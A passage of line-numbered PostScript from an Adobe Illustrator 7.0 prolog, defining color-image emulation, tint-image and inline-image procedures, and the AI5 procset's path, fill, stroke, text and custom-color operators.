mul add 1452 | 1453 | dup 255 gt { pop 255 } if 1454 | 1455 | 255 exch sub cvi 3 copy put 1456 | 1457 | pop 1 add 1458 | } def 1459 | /RGBToGrayImageProc { 1460 | Adobe_ColorImage_AI6_Vars begin 1461 | sourcearray 0 get exec 1462 | dup length 3 idiv string 1463 | dup 3 1 roll 1464 | 1465 | /StuffRGBIntoGrayString load exch 1466 | WalkRGBString 1467 | end 1468 | } def 1469 | /CMYKToGrayImageProc { 1470 | Adobe_ColorImage_AI6_Vars begin 1471 | sourcearray 0 get exec 1472 | dup length 4 idiv string 1473 | dup 3 1 roll 1474 | 1475 | /StuffCMYKIntoGrayString load exch 1476 | WalkCMYKString 1477 | end 1478 | } def 1479 | /SeparateCMYKImageProc { 1480 | Adobe_ColorImage_AI6_Vars begin 1481 | sourcecount 0 ne { 1482 | sourcearray plateindex get exec 1483 | }{ 1484 | sourcearray 0 get exec 1485 | 1486 | dup length 4 idiv string 1487 | 1488 | 0 2 index 1489 | 1490 | plateindex 4 2 index length 1 sub { 1491 | get 255 exch sub 1492 | 1493 | 3 copy put pop 1 add 1494 | 1495 | 2 index 1496 | } for 1497 | pop pop exch pop 1498 | } ifelse 1499 | end 1500 | } def 1501 | 1502 | /ColorImageCompositeEmulator { 1503 | pop true eq { 1504 | Adobe_ColorImage_AI6_Vars /sourcecount get 5 add { pop } repeat 1505 | }{ 1506 | Adobe_ColorImage_AI6_Vars /channelcount get 1 ne { 1507 | Adobe_ColorImage_AI6_Vars begin 1508 | sourcearray 0 3 -1 roll put 1509 | 1510 | channelcount 3 eq {/RGBToGrayImageProc}{/CMYKToGrayImageProc} ifelse 1511 | load 1512 | end 1513 | } if 1514 | image 1515 | } ifelse 1516 | } def 1517 | /colorimage { 1518 | Adobe_ColorImage_AI6_Vars begin 1519 | /channelcount 1 index def 1520 | /sourcecount 2 index 1 eq { channelcount 1 sub } { 0 } ifelse def 1521 | 4 sourcecount add index 1522 | end 1523 | 1524 | dup 8 eq exch 1 eq or not { 1525 | /_colorimage load null ne { 1526 | _colorimage 1527 | }{ 1528 | Adobe_ColorImage_AI6_Vars /sourcecount get 1529 | 7 add { pop } repeat 1530 | } ifelse 1531 | }{ 1532 | dup 3 eq TestPlateIndex dup -1 eq exch 5 eq or or { 1533 | /_colorimage load null eq { 1534 | ColorImageCompositeEmulator 1535 | }{ 1536 | dup 1 eq { 1537 | pop pop image 1538 | }{ 1539 | Adobe_ColorImage_AI6_Vars /plateindex get 5 eq { 1540 | gsave 1541 | 1542 | 0 _currenttransfer exec 1543 | 1 _currenttransfer exec 1544 | eq 1545 | { 0 _currenttransfer exec 0.5 lt } 1546 | { 0 _currenttransfer exec 1 _currenttransfer exec gt } ifelse 1547 | 1548 | { { pop 0 } } { { pop 1 } } ifelse 1549 | systemdict /settransfer get exec 1550 | } if 1551 | 1552 | _colorimage 1553 | 1554 | Adobe_ColorImage_AI6_Vars /plateindex get 5 eq { 1555 | grestore 1556 | } if 1557 | } ifelse 1558 | } ifelse 1559 | }{ 1560 | dup 1 eq { 1561 | pop pop 1562 | image 1563 | }{ 1564 | pop pop 1565 | Adobe_ColorImage_AI6_Vars begin 1566 | sourcecount -1 0 { 1567 | exch sourcearray 3 1 roll put 1568 | } for 1569 | /SeparateCMYKImageProc load 1570 | end 1571 | systemdict /image get exec 1572 | } ifelse 1573 | } ifelse 1574 | } ifelse 1575 | } def 1576 | /proctintimage { 1577 | /_ptispace exch store /_ptiname exch store /_pti1 exch store /_pti0 exch store /_ptiproc exch store 1578 | /_pticomps _ptispace clrspacegetcomps store 1579 | /_ptiscale _pti1 _pti0 sub store 1580 | level2? { 1581 | _ptiname length 0 gt version cvr 2012 ge and { 1582 | [/Separation _ptiname _ptispace {_ptiproc}] setcolorspace 1583 | [_pti0 _pti1] makeimagedict _image 1584 | }{ 1585 | [/Indexed _ptispace 255 {255 div _ptiscale mul _pti0 add _ptiproc}] setcolorspace 1586 | [0 255] makeimagedict _image 1587 | } ifelse 1588 | }{ 1589 | _pticomps 1 eq { 1590 | { 1591 | dup 1592 | { 1593 | 255 div _ptiscale mul _pti0 add _ptiproc 255 mul cvi put 1594 | } stringapply 1595 | } concatprocs _image 1596 | }{ 1597 | { 1598 | dup length _pticomps mul dup _ptibuf length ne {/_ptibuf exch string store}{pop} ifelse 1599 | _ptibuf { 1600 | exch _pticomps mul exch 255 div _ptiscale mul _pti0 add _ptiproc 1601 | _pticomps 2 add -2 roll 1602 | _pticomps 1 sub -1 0 { 1603 | 1 index add 2 index exch 1604 | 5 -1 roll 1605 | 255 mul cvi put 1606 | } for 1607 | pop pop 1608 | } stringapply 1609 | } concatprocs false _pticomps 1610 | /_colorimage load null eq {7 {pop} repeat}{_colorimage} ifelse 1611 | } ifelse 1612 | } ifelse 1613 | } def 1614 | /graytintimage { 1615 | /_gtigray 5 -1 roll store 1616 | {1 _gtigray sub mul 1 exch sub} 4 1 roll 1617 | /DeviceGray proctintimage 1618 | } def 1619 | /cmyktintimage { 1620 | /_cticmyk 5 -1 roll store 1621 | {_cticmyk {1 index mul exch} forall pop} 4 1 roll 1622 | /DeviceCMYK proctintimage 1623 | } def 1624 | /rgbtintimage { 1625 | /_rtirgb 5 -1 roll store 1626 | {_rtirgb {1 exch sub 1 index mul 1 exch sub exch} forall pop} 4 1 roll 1627 | /DeviceRGB proctintimage 1628 | } def 1629 | /tintimage { 1630 | TestPlateIndex -1 eq { 1631 | colorexpand 1632 | 3 -1 roll 5 -1 roll {0}{0 exch} ifelse 4 2 roll 1633 | dup /DeviceGray eq { 1634 | pop graytintimage 1635 | }{ 1636 | dup /DeviceRGB eq { 1637 | pop rgbtintimage 1638 | }{ 1639 | pop cmyktintimage 1640 | } ifelse 1641 | } ifelse 1642 | }{ 1643 | dup clrspacemarksplate { 1644 | plateindex 5 lt { 1645 | colortocmyk plateindex get 1 exch sub 1646 | exch {1 0}{0 1} ifelse () graytintimage 1647 | }{ 1648 | pop exch {0}{0 exch} ifelse 0 3 1 roll () graytintimage 1649 | } ifelse 1650 | }{ 1651 | pop pop pop 1652 | {pop 1} 0 1 () /DeviceGray proctintimage 1653 | } ifelse 1654 | } ifelse 1655 | } def 1656 | /XINullImage { 1657 | } def 1658 | /XIImageMask { 1659 | XIImageWidth XIImageHeight false 1660 | [XIImageWidth 0 0 XIImageHeight neg 0 0] 1661 | /XIDataProc load 1662 | imagemask 1663 | } def 1664 | /XIImageTint { 1665 | 0 setgray 1666 | XIImageWidth XIImageHeight XIBitsPerPixel 1667 | [XIImageWidth 0 0 XIImageHeight neg 0 0] 1668 | /XIDataProc load 1669 | XIType 3 eq XIColorValues XIColorSpace tintimage 1670 | } def 1671 | /XIImage { 1672 | 0 setgray 1673 | XIImageWidth XIImageHeight XIBitsPerPixel 1674 | [XIImageWidth 0 0 XIImageHeight neg 0 0] 1675 | /XIDataProc load 1676 | XIChannelCount 1 eq {image}{false XIChannelCount colorimage} ifelse 1677 | } def 1678 | /XG { 1679 | pop pop 1680 | } def 1681 | /XF { 1682 | 13 {pop} repeat 1683 | } def 1684 | /Xh { 1685 | Adobe_ColorImage_AI6_Vars begin 1686 | gsave 1687 | /XIType exch def 1688 | /XIImageHeight exch def 1689 | /XIImageWidth exch def 1690 | /XIImageMatrix exch def 1691 | 0 0 moveto 1692 | XIImageMatrix concat 1693 | XIImageWidth XIImageHeight scale 1694 | 1695 | XIType 1 eq { 1696 | /_lp /null ddef 1697 | _fc 1698 | /_lp /imagemask ddef 1699 | } 1700 | if 1701 | /XIVersion 7 def 1702 | end 1703 | } def 1704 | /XH { 1705 | Adobe_ColorImage_AI6_Vars begin 1706 | /XIVersion 6 def 1707 | grestore 1708 | end 1709 | } def 1710 | /XIEnable { 1711 | Adobe_ColorImage_AI6_Vars /XIEnable 3 -1 roll put 1712 | } def 1713 | /XC { 1714 | Adobe_ColorImage_AI6_Vars begin 1715 | colormake 1716 | /XIColorSpace exch def 1717 | /XIColorValues exch def 1718 | end 1719 | } def 1720 | /XI 1721 | { 1722 | Adobe_ColorImage_AI6_Vars begin 1723 | gsave 1724 | /XIType exch def 1725 | cvi dup 1726 | 256 idiv /XICompression exch store 1727 | 256 mod /XIEncoding exch store 1728 | pop pop 1729 | /XIChannelCount exch def 1730 | /XIBitsPerPixel exch def 1731 | /XIImageHeight exch def 1732 | /XIImageWidth exch def 1733 | pop pop pop pop 1734 | /XIImageMatrix exch def 1735 | XIBitsPerPixel 1 eq { 1736 | XIImageWidth 8 div ceiling cvi 1737 | }{ 1738 | XIImageWidth XIChannelCount mul 1739 | } ifelse 1740 | /XIRowBytes exch def 1741 | XIEncoding 0 ne XIVersion 6 le and { 1742 | currentfile 128 string readline pop pop 1743 | } if 1744 | XICompression 0 eq { 1745 | /XIBuffer1 XIRowBytes string def 1746 | XIEncoding 0 eq { 1747 | {currentfile XIBuffer1 readhexstring pop} 1748 | }{ 1749 | {currentfile XIBuffer1 readstring pop} 1750 | } ifelse 1751 | }{ 1752 | /XIBuffer1 256 string def 1753 | /XIBuffer2 XIRowBytes string def 1754 | {currentfile XIBuffer1 readline pop (%) anchorsearch {pop} if} 1755 | /ASCIIHexDecode filter /DCTDecode filter 1756 | /XIFile exch def 1757 | {XIFile XIBuffer2 readstring pop} 1758 | } ifelse 1759 | /XIDataProc exch def 1760 | 1761 | XIVersion 6 le { 1762 | 0 0 moveto 1763 | XIImageMatrix concat 1764 | XIImageWidth XIImageHeight scale 1765 | XIType 1 eq { 1766 | /_lp /null ddef 1767 | _fc 1768 | /_lp /imagemask ddef 1769 | } if 1770 | } if 1771 | XIEnable { 1772 | XIType 1 eq { 1773 | XIImageMask 1774 | }{ 1775 | XIType 2 eq XIType 3 eq or { 1776 | XIImageTint 1777 | }{ 1778 | XIImage 1779 | } ifelse 1780 | } ifelse 1781 | }{ 1782 | XINullImage 1783 | } ifelse 1784 | grestore 1785 | end 1786 | } def 1787 | end 1788 | %%EndProcSet 1789 | %%BeginResource: procset Adobe_Illustrator_AI5 1.2 0 1790 | %%Title: (Adobe Illustrator (R) Version 7.0 Full Prolog) 1791 | %%Version: 1.2 0 1792 | %%CreationDate: (3/7/1994) () 1793 | %%Copyright: ((C) 1987-1996 Adobe Systems Incorporated All Rights Reserved) 1794 | currentpacking true setpacking 1795 | userdict /Adobe_Illustrator_AI5_vars 107 dict dup begin 1796 | put 1797 | /_eo false def 1798 | /_lp /none def 1799 | /_pf 1800 | { 1801 | } def 1802 | /_ps 1803 | { 1804 | } def 1805 | /_psf 1806 | { 1807 | } def 1808 | /_pss 1809 | { 1810 | } def 1811 | /_pjsf 1812 | { 1813 | } def 1814 | /_pjss 1815 | { 1816 | } def 1817 | /_pola 0 def 1818 | /_doClip 0 def 1819 | /cf currentflat def 1820 | /_lineorientation 0 def 1821 | /_charorientation 0 def 1822 | /_yokoorientation 0 def 1823 | /_tm matrix def 1824 | /_renderStart 1825 | [ 1826 | /e0 /r0 /a0 /o0 /e1 /r1 /a1 /i0 1827 | ] def 1828 | /_renderEnd 1829 | [ 1830 | null null null null /i1 /i1 /i1 /i1 1831 | ] def 1832 | /_render -1 def 1833 | /_shift [0 0] def 1834 | /_ax 0 def 1835 | /_ay 0 def 1836 | /_cx 0 def 1837 | /_cy 0 def 1838 | /_leading 1839 | [ 1840 | 0 0 1841 | ] def 1842 | /_ctm matrix def 1843 | /_mtx matrix def 1844 | /_sp 16#020 def 1845 | /_hyphen (-) def 1846 | /_fontSize 0 def 1847 | /_fontAscent 0 def 1848 | /_fontDescent 0 def 1849 | /_fontHeight 0 def 1850 | /_fontRotateAdjust 0 def 1851 | /Ss 256 string def 1852 | Ss 0 (fonts/) putinterval 1853 | /_cnt 0 def 1854 | /_scale [1 1] def 1855 | /_nativeEncoding 0 def 1856 | /_useNativeEncoding 0 def 1857 | /_tempEncode 0 def 1858 | /_pntr 0 def 1859 | /_tDict 2 dict def 1860 | /_hfname 100 string def 1861 | /_hffound false def 1862 | /Tx 1863 | { 1864 | } def 1865 | /Tj 1866 | { 1867 | } def 1868 | /CRender 1869 | { 1870 | } def 1871 | /_AI3_savepage 1872 | { 1873 | } def 1874 | /_gf null def 1875 | /_cf 4 array def 1876 | /_rgbf 3 array def 1877 | /_if null def 1878 | /_of false def 1879 | /_fc 1880 | { 1881 | } def 1882 | /_gs null def 1883 | /_cs 4 array def 1884 | /_rgbs 3 array def 1885 | /_is null def 1886 | /_os false def 1887 | /_sc 1888 | { 1889 | } def 1890 | /_pd 1 dict def 1891 | /_ed 15 dict def 1892 | /_pm matrix def 1893 | /_fm null def 1894 | /_fd null def 1895 | /_fdd null def 1896 | /_sm null def 1897 | /_sd null def 1898 | /_sdd null def 1899 | /_i null def 1900 | /_lobyte 0 def 1901 | /_hibyte 0 def 1902 | /_cproc null def 1903 | /_cscript 0 def 1904 | /_hvax 0 def 1905 | /_hvay 0 def 1906 | /_hvwb 0 def 1907 | /_hvcx 0 def 1908 | /_hvcy 0 def 1909 | /_bitfont null def 1910 | /_bitlobyte 0 def 1911 | /_bithibyte 0 def 1912 | /_bitkey null def 1913 | /_bitdata null def 1914 | /_bitindex 0 def 1915 | /discardSave null def 1916 | /buffer 256 string def 1917 | /beginString null def 1918 | /endString null def 1919 | /endStringLength null def 1920 | /layerCnt 1 def 1921 | /layerCount 1 def 1922 | /perCent (%) 0 get def 1923 | /perCentSeen? false def 1924 | /newBuff null def 1925 | /newBuffButFirst null def 1926 | /newBuffLast null def 1927 | /clipForward? false def 1928 | end 1929 | userdict /Adobe_Illustrator_AI5 known not { 1930 | userdict /Adobe_Illustrator_AI5 95 dict put 1931 | } if 1932 | userdict /Adobe_Illustrator_AI5 get begin 1933 | /initialize 1934 | { 1935 | Adobe_Illustrator_AI5 dup begin 1936 | Adobe_Illustrator_AI5_vars begin 1937 | discardDict 1938 | { 1939 | bind pop pop 1940 | } forall 1941 | dup /nc get begin 1942 | { 1943 | dup xcheck 1 index type /operatortype ne and 1944 | { 1945 | bind 1946 | } if 1947 | pop pop 1948 | } forall 1949 | end 1950 | newpath 1951 | } def 1952 | /terminate 1953 | { 1954 | end 1955 | end 1956 | } def 1957 | /_ 1958 | null def 1959 | /ddef 1960 | { 1961 | Adobe_Illustrator_AI5_vars 3 1 roll put 1962 | } def 1963 | /xput 1964 | { 1965 | dup load dup length exch maxlength eq 1966 | { 1967 | dup dup load dup 1968 | length 2 mul dict copy def 1969 | } if 1970 | load begin 1971 | def 1972 | end 1973 | } def 1974 | /npop 1975 | { 1976 | { 1977 | pop 1978 | } repeat 1979 | } def 1980 | /hswj 1981 | { 1982 | dup stringwidth 3 2 roll 1983 | { 1984 | _hvwb eq { exch _hvcx add exch _hvcy add } if 1985 | exch _hvax add exch _hvay add 1986 | } cforall 1987 | } def 1988 | /vswj 1989 | { 1990 | 0 0 3 -1 roll 1991 | { 1992 | dup 255 le 1993 | _charorientation 1 eq 1994 | and 1995 | { 1996 | dup cstring stringwidth 5 2 roll 1997 | _hvwb eq { exch _hvcy sub exch _hvcx sub } if 1998 | exch _hvay sub exch _hvax sub 1999 | 4 -1 roll sub exch 2000 | 3 -1 roll sub exch 2001 | } 2002 | { 2003 | _hvwb eq { exch _hvcy sub exch _hvcx sub } if 2004 | exch _hvay sub exch _hvax sub 2005 | _fontHeight sub 2006 | } ifelse 2007 | } cforall 2008 | } def 2009 | /swj 2010 | { 2011 | 6 1 roll 2012 | /_hvay exch ddef 2013 | /_hvax exch ddef 2014 | /_hvwb exch ddef 2015 | /_hvcy exch ddef 2016 | /_hvcx exch ddef 2017 | _lineorientation 0 eq { hswj } { vswj } ifelse 2018 | } def 2019 | /sw 2020 | { 2021 | 0 0 0 6 3 roll swj 2022 | } def 2023 | /vjss 2024 | { 2025 | 4 1 roll 2026 | { 2027 | dup cstring 2028 | dup length 1 eq 2029 | _charorientation 1 eq 2030 | and 2031 | { 2032 | -90 rotate 2033 | currentpoint 2034 | _fontRotateAdjust add 2035 | moveto 2036 | gsave 2037 | false charpath currentpoint 2038 | 5 index setmatrix stroke 2039 | grestore 2040 | _fontRotateAdjust sub 2041 | moveto 2042 | _sp eq 2043 | { 2044 | 5 index 5 index rmoveto 2045 | } if 2046 | 2 copy rmoveto 2047 | 90 rotate 2048 | } 2049 | { 2050 | currentpoint 2051 | _fontHeight sub 2052 | 5 index sub 2053 | 3 index _sp eq 2054 | { 2055 | 9 index sub 2056 | } if 2057 | 2058 | currentpoint 2059 | exch 4 index stringwidth pop 2 div sub 2060 | exch _fontAscent sub 2061 | moveto 2062 | 2063 | gsave 2064 | 2 index false charpath 2065 | 6 index setmatrix stroke 2066 | grestore 2067 | 2068 | moveto pop pop 2069 | } ifelse 2070 | } cforall 2071 | 6 npop 2072 | } def 2073 | /hjss 2074 | { 2075 | 4 1 roll 2076 | { 2077 | dup cstring 2078 | gsave 2079 | false charpath currentpoint 2080 | 5 index setmatrix stroke 2081 | grestore 2082 | moveto 2083 | _sp eq 2084 | { 2085 | 5 index 5 index rmoveto 2086 | } if 2087 | 2 copy rmoveto 2088 | } cforall 2089 | 6 npop 2090 | } def 2091 | /jss 2092 | { 2093 | _lineorientation 0 eq { hjss } { vjss } ifelse 2094 | } def 2095 | /ss 2096 | { 2097 | 0 0 0 7 3 roll jss 2098 | } def 2099 | /vjsp 2100 | { 2101 | 4 1 roll 2102 | { 2103 | dup cstring 2104 | dup length 1 eq 2105 | _charorientation 1 eq 2106 | and 2107 | { 2108 | -90 rotate 2109 | currentpoint 2110 | _fontRotateAdjust add 2111 | moveto 2112 | false charpath 2113 | currentpoint 2114 | _fontRotateAdjust sub 2115 | moveto 2116 | _sp eq 2117 | { 2118 | 5 index 5 index rmoveto 2119 | } if 2120 | 2 copy rmoveto 2121 | 90 rotate 2122 | } 2123 | { 2124 | currentpoint 2125 | _fontHeight sub 2126 | 5 index sub 2127 | 3 index _sp eq 2128 | { 2129 | 9 index sub 2130 | } if 2131 | 2132 | currentpoint 2133 | exch 4 index stringwidth pop 2 div sub 2134 | exch _fontAscent sub 2135 | moveto 2136 | 2137 | 2 index false charpath 2138 | 2139 | moveto pop pop 2140 | } ifelse 2141 | } cforall 2142 | 6 npop 2143 | } def 2144 | /hjsp 2145 | { 2146 | 4 1 roll 2147 | { 2148 | dup cstring 2149 | false charpath 2150 | _sp eq 2151 | { 2152 | 5 index 5 index rmoveto 2153 | } if 2154 | 2 copy rmoveto 2155 | } cforall 2156 | 6 npop 2157 | } def 2158 | /jsp 2159 | { 2160 | matrix currentmatrix 2161 | _lineorientation 0 eq {hjsp} {vjsp} ifelse 2162 | } def 2163 | /sp 2164 | { 2165 | matrix currentmatrix 2166 | 0 0 0 7 3 roll 2167 | _lineorientation 0 eq {hjsp} {vjsp} ifelse 2168 | } def 2169 | /pl 2170 | { 2171 | transform 2172 | 0.25 sub round 0.25 add exch 2173 | 0.25 sub round 0.25 add exch 2174 | itransform 2175 | } def 2176 | /setstrokeadjust where 2177 | { 2178 | pop true setstrokeadjust 2179 | /c 2180 | { 2181 | curveto 2182 | } def 2183 | /C 2184 | /c load def 2185 | /v 2186 | { 2187 | currentpoint 6 2 roll curveto 2188 | } def 2189 | /V 2190 | /v load def 2191 | /y 2192 | { 2193 | 2 copy curveto 2194 | } def 2195 | /Y 2196 | /y load def 2197 | /l 2198 | { 2199 | lineto 2200 | } def 2201 | /L 2202 | /l load def 2203 | /m 2204 | { 2205 | moveto 2206 | } def 2207 | } 2208 | { 2209 | /c 2210 | { 2211 | pl curveto 2212 | } def 2213 | /C 2214 | /c load def 2215 | /v 2216 | { 2217 | currentpoint 6 2 roll pl curveto 2218 | } def 2219 | /V 2220 | /v load def 2221 | /y 2222 | { 2223 | pl 2 copy curveto 2224 | } def 2225 | /Y 2226 | /y load def 2227 | /l 2228 | { 2229 | pl lineto 2230 | } def 2231 | /L 2232 | /l load def 2233 | /m 2234 | { 2235 | pl moveto 2236 | } def 2237 | } ifelse 2238 | /d 2239 | { 2240 | setdash 2241 | } def 2242 | /cf 2243 | { 2244 | } def 2245 | /i 2246 | { 2247 | dup 0 eq 2248 | { 2249 | pop cf 2250 | } if 2251 | setflat 2252 | } def 2253 | /j 2254 | { 2255 | setlinejoin 2256 | } def 2257 | /J 2258 | { 2259 | setlinecap 2260 | } def 2261 | /M 2262 | { 2263 | setmiterlimit 2264 | } def 2265 | /w 2266 | { 2267 | setlinewidth 2268 | } def 2269 | /XR 2270 | { 2271 | 0 ne 2272 | /_eo exch ddef 2273 | } def 2274 | /H 2275 | { 2276 | } def 2277 | /h 2278 | { 2279 | closepath 2280 | } def 2281 | /N 2282 | { 2283 | _pola 0 eq 2284 | { 2285 | _doClip 1 eq 2286 | { 2287 | _eo {eoclip} {clip} ifelse /_doClip 0 ddef 2288 | } if 2289 | newpath 2290 | } 2291 | { 2292 | /CRender 2293 | { 2294 | N 2295 | } ddef 2296 | } ifelse 2297 | } def 2298 | /n 2299 | { 2300 | N 2301 | } def 2302 | /F 2303 | { 2304 | _pola 0 eq 2305 | { 2306 | _doClip 1 eq 2307 | { 2308 | gsave _pf grestore _eo {eoclip} {clip} ifelse newpath /_lp /none ddef _fc 2309 | /_doClip 0 ddef 2310 | } 2311 | { 2312 | _pf 2313 | } ifelse 2314 | } 2315 | { 2316 | /CRender 2317 | { 2318 | F 2319 | } ddef 2320 | } ifelse 2321 | } def 2322 | /f 2323 | { 2324 | closepath 2325 | F 2326 | } def 2327 | /S 2328 | { 2329 | _pola 0 eq 2330 | { 2331 | _doClip 1 eq 2332 | { 2333 | gsave _ps grestore _eo {eoclip} {clip} ifelse newpath /_lp /none ddef _sc 2334 | /_doClip 0 ddef 2335 | } 2336 | { 2337 | _ps 2338 | } ifelse 2339 | } 2340 | { 2341 | /CRender 2342 | { 2343 | S 2344 | } ddef 2345 | } ifelse 2346 | } def 2347 | /s 2348 | { 2349 | closepath 2350 | S 2351 | } def 2352 | /B 2353 | { 2354 | _pola 0 eq 2355 | { 2356 | _doClip 1 eq 2357 | gsave F grestore 2358 | { 2359 | gsave S grestore _eo {eoclip} {clip} ifelse newpath /_lp /none ddef _sc 2360 | /_doClip 0 ddef 2361 | } 2362 | { 2363 | S 2364 | } ifelse 2365 | } 2366 | { 2367 | /CRender 2368 | { 2369 | B 2370 | } ddef 2371 | } ifelse 2372 | } def 2373 | /b 2374 | { 2375 | closepath 2376 | B 2377 | } def 2378 | /W 2379 | { 2380 | /_doClip 1 ddef 2381 | } def 2382 | /* 2383 | { 2384 | count 0 ne 2385 | { 2386 | dup type /stringtype eq 2387 | { 2388 | pop 2389 | } if 2390 | } if 2391 | newpath 2392 | } def 2393 | /u 2394 | { 2395 | } def 2396 | /U 2397 | { 2398 | } def 2399 | /q 2400 | { 2401 | _pola 0 eq 2402 | { 2403 | gsave 2404 | } if 2405 | } def 2406 | /Q 2407 | { 2408 | _pola 0 eq 2409 | { 2410 | grestore 2411 | } if 2412 | } def 2413 | /*u 2414 | { 2415 | _pola 1 add /_pola exch ddef 2416 | } def 2417 | /*U 2418 | { 2419 | _pola 1 sub /_pola exch ddef 2420 | _pola 0 eq 2421 | { 2422 | CRender 2423 | } if 2424 | } def 2425 | /D 2426 | { 2427 | pop 2428 | } def 2429 | /*w 2430 | { 2431 | } def 2432 | /*W 2433 | { 2434 | } def 2435 | /` 2436 | { 2437 | /_i save ddef 2438 | clipForward? 2439 | { 2440 | nulldevice 2441 | } if 2442 | 6 1 roll 4 npop 2443 | concat pop 2444 | userdict begin 2445 | /showpage 2446 | { 2447 | } def 2448 | 0 setgray 2449 | 0 setlinecap 2450 | 1 setlinewidth 2451 | 0 setlinejoin 2452 | 10 setmiterlimit 2453 | [] 0 setdash 2454 | /setstrokeadjust where {pop false setstrokeadjust} if 2455 | newpath 2456 | 0 setgray 2457 | false setoverprint 2458 | } def 2459 | /~ 2460 | { 2461 | end 2462 | _i restore 2463 | } def 2464 | /O 2465 | { 2466 | 0 ne 2467 | /_of exch ddef 2468 | /_lp /none ddef 2469 | } def 2470 | /R 2471 | { 2472 | 0 ne 2473 | /_os exch ddef 2474 | /_lp /none ddef 2475 | } def 2476 | /g 2477 | { 2478 | /_gf exch ddef 2479 | /_fc 2480 | { 2481 | _lp /fill ne 2482 | { 2483 | _of setoverprint 2484 | _gf setgray 2485 | /_lp /fill ddef 2486 | } if 2487 | } ddef 2488 | /_pf 2489 | { 2490 | _fc 2491 | _eo {eofill} {fill} ifelse 2492 | } ddef 2493 | /_psf 2494 | { 2495 | _fc 2496 | hvashow 2497 | } ddef 2498 | /_pjsf 2499 | { 2500 | _fc 2501 | hvawidthshow 2502 | } ddef 2503 | /_lp /none ddef 2504 | } def 2505 | /G 2506 | { 2507 | /_gs exch ddef 2508 | /_sc 2509 | { 2510 | _lp /stroke ne 2511 | { 2512 | _os setoverprint 2513 | _gs setgray 2514 | /_lp /stroke ddef 2515 | } if 2516 | } ddef 2517 | /_ps 2518 | { 2519 | _sc 2520 | stroke 2521 | } ddef 2522 | /_pss 2523 | { 2524 | _sc 2525 | ss 2526 | } ddef 2527 | /_pjss 2528 | { 2529 | _sc 2530 | jss 2531 | } ddef 2532 | /_lp /none ddef 2533 | } def 2534 | /k 2535 | { 2536 | _cf astore pop 2537 | /_fc 2538 | { 2539 | _lp /fill ne 2540 | { 2541 | _of setoverprint 2542 | _cf aload pop setcmykcolor 2543 | /_lp /fill ddef 2544 | } if 2545 | } ddef 2546 | /_pf 2547 | { 2548 | _fc 2549 | _eo {eofill} {fill} ifelse 2550 | } ddef 2551 | /_psf 2552 | { 2553 | _fc 2554 | hvashow 2555 | } ddef 2556 | /_pjsf 2557 | { 2558 | _fc 2559 | hvawidthshow 2560 | } ddef 2561 | /_lp /none ddef 2562 | } def 2563 | /K 2564 | { 2565 | _cs astore pop 2566 | /_sc 2567 | { 2568 | _lp /stroke ne 2569 | { 2570 | _os setoverprint 2571 | _cs aload pop setcmykcolor 2572 | /_lp /stroke ddef 2573 | } if 2574 | } ddef 2575 | /_ps 2576 | { 2577 | _sc 2578 | stroke 2579 | } ddef 2580 | /_pss 2581 | { 2582 | _sc 2583 | ss 2584 | } ddef 2585 | /_pjss 2586 | { 2587 | _sc 2588 | jss 2589 | } ddef 2590 | /_lp /none ddef 2591 | } def 2592 | /Xa 2593 | { 2594 | _rgbf astore pop 2595 | /_fc 2596 | { 2597 | _lp /fill ne 2598 | { 2599 | _of setoverprint 2600 | _rgbf aload pop setrgbcolor 2601 | /_lp /fill ddef 2602 | } if 2603 | } ddef 2604 | /_pf 2605 | { 2606 | _fc 2607 | _eo {eofill} {fill} ifelse 2608 | } ddef 2609 | /_psf 2610 | { 2611 | _fc 2612 | hvashow 2613 | } ddef 2614 | /_pjsf 2615 | { 2616 | _fc 2617 | hvawidthshow 2618 | } ddef 2619 | /_lp /none ddef 2620 | } def 2621 | /XA 2622 | { 2623 | _rgbs astore pop 2624 | /_sc 2625 | { 2626 | _lp /stroke ne 2627 | { 2628 | _os setoverprint 2629 | _rgbs aload pop setrgbcolor 2630 | /_lp /stroke ddef 2631 | } if 2632 | } ddef 2633 | /_ps 2634 | { 2635 | _sc 2636 | stroke 2637 | } ddef 2638 | /_pss 2639 | { 2640 | _sc 2641 | ss 2642 | } ddef 2643 | /_pjss 2644 | { 2645 | _sc 2646 | jss 2647 | } ddef 2648 | /_lp /none ddef 2649 | } def 2650 | /_rgbtocmyk 2651 | { 2652 | 3 2653 | { 2654 | 1 exch sub 3 1 roll 2655 | } repeat 2656 | 3 copy 1 4 1 roll 2657 | 3 2658 | { 2659 | 3 index 2 copy gt 2660 | { 2661 | exch 2662 | } if 2663 | pop 4 1 roll 2664 | } repeat 2665 | pop pop pop 2666 | 4 1 roll 2667 | 3 2668 | { 2669 | 3 index sub 2670 | 3 1 roll 2671 | } repeat 2672 | 4 -1 roll 2673 | } def 2674 | /Xx 2675 | { 2676 | exch 2677 | /_gf exch ddef 2678 | 0 eq 2679 | { 2680 | findcmykcustomcolor 2681 | } 2682 | { 2683 | /findrgbcustomcolor where not { 2684 | 4 1 roll _rgbtocmyk 2685 | 5 -1 roll 2686 | findcmykcustomcolor 2687 | } 2688 | { 2689 | pop 2690 | findrgbcustomcolor 2691 | } ifelse 2692 | } ifelse 2693 | /_if exch ddef 2694 | /_fc 2695 | { 2696 | _lp /fill ne 2697 | { 2698 | _of setoverprint 2699 | _if _gf 1 exch sub setcustomcolor 2700 | /_lp /fill ddef 2701 | } if 2702 | } ddef 2703 | /_pf 2704 | { 2705 | _fc 2706 | _eo {eofill} {fill} ifelse 2707 | } ddef 2708 | /_psf 2709 | { 2710 | _fc 2711 | hvashow 2712 | } ddef 2713 | /_pjsf 2714 | { 2715 | _fc 2716 | hvawidthshow 2717 | } ddef 2718 | /_lp /none ddef 2719 | } def 2720 | /XX 2721 | { 2722 | exch 2723 | /_gs exch ddef 2724 | 0 eq 2725 | { 2726 | findcmykcustomcolor 2727 | } 2728 | { 2729 | /findrgbcustomcolor where not { 2730 | 4 1 roll _rgbtocmyk 2731 | 5 -1 roll 2732 | findcmykcustomcolor 2733 | } 2734 | { 2735 | pop 2736 | findrgbcustomcolor 2737 | } ifelse 2738 | } ifelse 2739 | /_is exch ddef 2740 | /_sc 2741 | { 2742 | _lp /stroke ne 2743 | { 2744 | _os setoverprint 2745 | _is _gs 1 exch sub setcustomcolor 2746 | /_lp /stroke ddef 2747 | } if 2748 | } ddef 2749 | /_ps 2750 | { 2751 | _sc 2752 | stroke 2753 | } ddef 2754 | /_pss 2755 | { 2756 | _sc 2757 | ss 2758 | } ddef 2759 | /_pjss 2760 | { 2761 | _sc 2762 | jss 2763 | } ddef 2764 | /_lp /none ddef 2765 | } def 2766 | /x 2767 | { 2768 | /_gf exch ddef 2769 | findcmykcustomcolor 2770 | 